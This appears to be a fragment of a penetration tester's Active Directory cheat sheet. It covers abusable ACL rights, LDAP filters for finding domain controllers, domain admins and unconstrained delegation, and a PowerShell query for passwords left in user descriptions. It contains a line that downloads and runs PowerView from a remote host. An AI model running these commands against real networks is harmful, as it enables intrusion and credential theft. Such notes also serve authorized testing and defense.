Global Group memberships *Domain Users *PswReaders
// import the powerview.ps1
IEX (New-Object Net.WebClient).DownloadString('http://192.168.x.x/powerview.ps1')
// dump the password information
Get-ADObject <hostname1>,<hostname2>
Object Control List (ACL)
GenericAll --> Full permission on object
GenericWrite --> Edit certain attributes on the object
WriteOwner --> Change ownership of the object
WriteDACL --> Edit ACE's applied to object
AllExtendedRights --> Change password, reset password, etc.
ForceChangePassword --> Password change for object
Self (Self-Membership) --> Add ourselves to for example a group
LDAP RECON
================
# look at all domain controllers
(primaryGroupID=516)
# look at all domain admins
(&(objectCategory=person)(objectClass=user)((memberOf=CN=Domain Admins,CN=Users,DC=TEST,DC=local)))
# unconstrained Delegations users
(userAccountControl:1.2.840.113556.1.4.803:=524288)
Using Powershell
# show the password in the description
Import-Module ActiveDirectory
Get-ADObject -LDAPFilter "(&(objectClass=user)(description=*pass*))" -property * | Select-Object SAMAccountName, Description, DistinguishedName
Have User & Pass SVC?
Some times services account indicate a Ticket possibility:
Don't miss this check: